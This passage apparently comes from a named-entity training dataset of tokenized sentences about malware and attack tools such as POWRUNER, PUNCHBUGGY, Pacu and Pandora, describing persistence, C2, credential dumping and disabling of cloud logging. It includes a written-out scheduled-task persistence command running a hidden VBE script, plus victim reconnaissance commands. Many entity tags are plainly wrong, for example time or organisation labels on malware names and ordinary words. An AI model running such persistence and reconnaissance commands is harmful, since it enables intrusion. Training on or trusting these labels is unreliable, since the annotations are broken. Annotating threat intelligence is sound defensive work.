"a", - "scheduled", - "task", - "using", - "the", - "command", - "<code>”C:\\Windows\\system32\\schtasks.exe”", - "/Create", - "/F", - "/SC", - "DAILY", - "/ST", - "12:00", - "/TN", - "MicrosoftEdge", - "/TR", - "“c:\\Windows\\system32\\wscript.exe", - "C:\\Windows\\temp\\Windows.vbe”</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "sleep", - "for", - "a", - "given", - "number", - "of", - "seconds." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "retrieve", - "screenshots", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "has", - "detected", - "security", - "tools." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "encoded", - "C2", - "traffic", - "with", - "base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "retrieve", - "OS", - "name/architecture", - "and", - "computer/domain", - "name", - "information", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "retrieve", - "IP,", - "network", - "adapter", - "configuration", - "information,", - "and", - "domain", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "has", - "the", - "ability", - "to", - "identify", - "the", - "username", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "use", - "VBScript", - "(VBE)", - "code", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERSTATS", - "can", - "use", - "WMI", - "queries", - "to", - "retrieve", - "data", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERTON", - "is", - "written", - "in", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERTON", - "can", - "install", - "a", - "Registry", - "Run", - "key", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERTON", - "has", - "the", - "ability", - "to", - "dump", - "password", - "hashes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "POWERTON", - "has", - "used", - "AES", - "for", - "encrypting", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERTON", - "has", - "used", - "HTTP/HTTPS", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWERTON", - "can", - "use", - "WMI", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "can", - "use", - "DNS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "user", - "account", - "information", - "by", - "running", - "<code>net", - "user", - "/domain</code>", - "or", - "a", - "series", - "of", - "other", - "commands", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "domain", - "group", - "information", - "by", - "running", - "<code>net", - "group", - "/domain</code>", - "or", - "a", - "series", - "of", - "other", - "commands", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "enumerate", - "user", - "directories", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "can", - "download", - "or", - "upload", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "local", - "group", - "information", - "by", - "running", - "<code>net", - "localgroup", - "administrators</code>", - "or", - "a", - "series", - "of", - "other", - "commands", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "is", - "written", - "in", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "process", - "information", - "by", - "running", - "<code>tasklist</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "query", - "the", - "Registry", - "by", - "running", - "<code>reg", - "query</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "persists", - "through", - "a", - "scheduled", - "task", - "that", - "executes", - "it", - "every", - "minute." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "can", - "capture", - "a", - "screenshot", - "from", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "information", - "on", - "the", - "victim's", - "anti-virus", - "software." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "can", - "use", - "base64", - "encoded", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "information", - "about", - "the", - "system", - "by", - "running", - "<code>hostname</code>", - "and", - "<code>systeminfo</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "network", - "configuration", - "data", - "by", - "running", - "<code>ipconfig", - "/all</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "active", - "network", - "connections", - "by", - "running", - "<code>netstat", - "-an</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "collect", - "information", - "about", - "the", - "currently", - "logged", - "in", - "user", - "by", - "running", - "<code>whoami</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "can", - "use", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "can", - "execute", - "commands", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "POWRUNER", - "may", - "use", - "WMI", - "when", - "collecting", - "information", - "about", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PS1", - "can", - "use", - "an", - "XOR", - "key", - "to", - "decrypt", - "a", - "PowerShell", - "loader", - "and", - "payload", - "binary." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PS1", - "can", - "inject", - "its", - "payload", - "DLL", - "Into", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PS1", - "is", - "distributed", - "as", - "a", - "set", - "of", - "encrypted", - "files", - "and", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CostaBricks", - "can", - "download", - "additional", - "payloads", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PS1", - "can", - "utilize", - "a", - "PowerShell", - "loader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "PULSECHECK", - "can", - "base-64", - "encode", - "encrypted", - "data", - "sent", - "through", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PULSECHECK", - "can", - "use", - "Unix", - "shell", - "script", - "for", - "command", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PULSECHECK", - "can", - "check", - "HTTP", - "request", - "headers", - "for", - "a", - "specific", - "backdoor", - "key", - "and", - "if", - "found", - "will", - "output", - "the", - "result", - "of", - "the", - "command", - "in", - "the", - "variable", - "`HTTP_X_CMD.`" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "PULSECHECK", - "is", - "a", - "web", - "shell", - "that", - "can", - "enable", - "command", - "execution", - "on", - "compromised", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "can", - "establish", - "using", - "a", - "AppCertDLLs", - "Registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "has", - "Gzipped", - "information", - "and", - "saved", - "it", - "to", - "a", - "random", - "temp", - "file", - "before", - "exfil." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "has", - "used", - "PowerShell", - "to", - "decode", - "base64-encoded", - "assembly." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "can", - "delete", - "files", - "written", - "to", - "disk." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "can", - "download", - "additional", - "files", - "and", - "payloads", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "can", - "gather", - "user", - "names." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "has", - "saved", - "information", - "to", - "a", - "random", - "temp", - "file", - "before", - "exfil." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "mimics", - "filenames", - "from", - "%SYSTEM%\\System32", - "to", - "hide", - "DLLs", - "in", - "%WINDIR%", - "and/or", - "%TEMP%." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "has", - "hashed", - "most", - "its", - "code's", - "functions", - "and", - "encrypted", - "payloads", - "with", - "base64", - "and", - "XOR." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "has", - "used", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "has", - "used", - "python", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "has", - "been", - "observed", - "using", - "a", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "can", - "load", - "a", - "DLL", - "using", - "Rundll32." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "can", - "gather", - "AVs", - "registered", - "in", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "can", - "load", - "a", - "DLL", - "using", - "the", - "LoadLibrary", - "API." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "can", - "gather", - "system", - "information", - "such", - "as", - "computer", - "names." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHBUGGY", - "enables", - "remote", - "interaction", - "and", - "can", - "obtain", - "additional", - "code", - "over", - "HTTPS", - "GET", - "and", - "POST", - "requests." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHTRACK", - "scrapes", - "memory", - "for", - "properly", - "formatted", - "payment", - "card", - "data." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PUNCHTRACK", - "aggregates", - "collected", - "data", - "in", - "a", - "tmp", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "PUNCHTRACK", - "is", - "loaded", - "and", - "executed", - "by", - "a", - "highly", - "obfuscated", - "launcher." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "generate", - "SSH", - "and", - "API", - "keys", - "for", - "AWS", - "infrastructure", - "and", - "additional", - "API", - "keys", - "for", - "other", - "IAM", - "users." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "automatically", - "collect", - "data,", - "such", - "as", - "CloudFormation", - "templates,", - "EC2", - "user", - "data,", - "AWS", - "Inspector", - "reports,", - "and", - "IAM", - "credential", - "reports." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "leverages", - "the", - "AWS", - "CLI", - "for", - "its", - "operations." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "enumerate", - "IAM", - "users,", - "roles,", - "and", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "leverages", - "valid", - "cloud", - "accounts", - "to", - "perform", - "most", - "of", - "its", - "operations." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "run", - "commands", - "on", - "EC2", - "instances", - "using", - "AWS", - "Systems", - "Manager", - "Run", - "Command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "enumerate", - "IAM", - "permissions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "enumerate", - "AWS", - "infrastructure,", - "such", - "as", - "EC2", - "instances." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "retrieve", - "secrets", - "from", - "the", - "AWS", - "Secrets", - "Manager", - "via", - "the", - "enum_secrets", - "module." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "enumerate", - "AWS", - "services,", - "such", - "as", - "CloudTrail", - "and", - "CloudWatch." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "enumerate", - "AWS", - "storage", - "services,", - "such", - "as", - "S3", - "buckets", - "and", - "Elastic", - "Block", - "Store", - "volumes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "create", - "snapshots", - "of", - "EBS", - "volumes", - "and", - "RDS", - "instances." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "enumerate", - "and", - "download", - "files", - "stored", - "in", - "AWS", - "storage", - "services,", - "such", - "as", - "S3", - "buckets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "allowlist", - "IP", - "addresses", - "in", - "AWS", - "GuardDuty." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "disable", - "or", - "otherwise", - "restrict", - "various", - "AWS", - "logging", - "services,", - "such", - "as", - "AWS", - "CloudTrail", - "and", - "VPC", - "flow", - "logs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "set", - "up", - "S3", - "bucket", - "notifications", - "to", - "trigger", - "a", - "malicious", - "Lambda", - "function", - "when", - "a", - "CloudFormation", - "template", - "is", - "uploaded", - "to", - "the", - "bucket.", - "It", - "can", - "also", - "create", - "Lambda", - "functions", - "that", - "trigger", - "upon", - "the", - "creation", - "of", - "users,", - "roles,", - "and", - "groups." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "collect", - "CloudTrail", - "event", - "histories", - "and", - "CloudWatch", - "logs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "enumerate", - "AWS", - "security", - "services,", - "including", - "WAF", - "rules", - "and", - "GuardDuty", - "detectors." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "create", - "malicious", - "Lambda", - "functions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Once", - "inside", - "a", - "Virtual", - "Private", - "Cloud,", - "Pacu", - "can", - "attempt", - "to", - "identify", - "DirectConnect,", - "VPN,", - "or", - "VPC", - "Peering." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Pacu", - "can", - "search", - "for", - "sensitive", - "data:", - "for", - "example,", - "in", - "Code", - "Build", - "environment", - "variables,", - "EC2", - "user", - "data,", - "and", - "Cloud", - "Formation", - "templates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "use", - "CVE-2017-15303", - "to", - "disable", - "Windows", - "Driver", - "Signature", - "Enforcement", - "(DSE)", - "protection", - "and", - "load", - "its", - "driver." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "use", - "DLL", - "side-loading", - "to", - "execute", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "use", - "CVE-2017-15303", - "to", - "bypass", - "Windows", - "Driver", - "Signature", - "Enforcement", - "(DSE)", - "protection", - "and", - "load", - "its", - "driver." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "load", - "additional", - "drivers", - "and", - "files", - "onto", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "write", - "an", - "encrypted", - "token", - "to", - "the", - "Registry", - "to", - "enable", - "processing", - "of", - "remote", - "commands." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "has", - "the", - "ability", - "to", - "compress", - "stings", - "with", - "QuickLZ." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "monitor", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "start", - "and", - "inject", - "code", - "into", - "a", - "new", - "`svchost`", - "process." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "has", - "the", - "ability", - "to", - "install", - "itself", - "as", - "a", - "Windows", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "has", - "the", - "ability", - "to", - "encrypt", - "communications", - "with", - "D3DES." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "identify", - "if", - "incoming", - "HTTP", - "traffic", - "contains", - "a", - "token", - "and", - "if", - "so", - "it", - "will", - "intercept", - "the", - "traffic", - "and", - "process", - "the", - "received", - "command." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pandora", - "can", - "communicate", - "over", - "HTTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pandora", - "has", - "the", - "ability", - "to", - "gain", - "system", - "privileges", - "through", - "Windows", - "services." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Features", - "I-Purp", - "I-Purp", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Pasam", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "retrieve", - "files." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pasam", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "delete", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Pasam", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "retrieve", - "lists", - "of", - "files." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pasam", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "upload", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Pasam", - "establishes", - "by", - "infecting", - "the", - "Security", - "Accounts", - "Manager", - "(SAM)", - "DLL", - "to", - "load", - "a", - "malicious", - "DLL", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pasam", - "creates", - "a", - "backdoor", - "through", - "which", 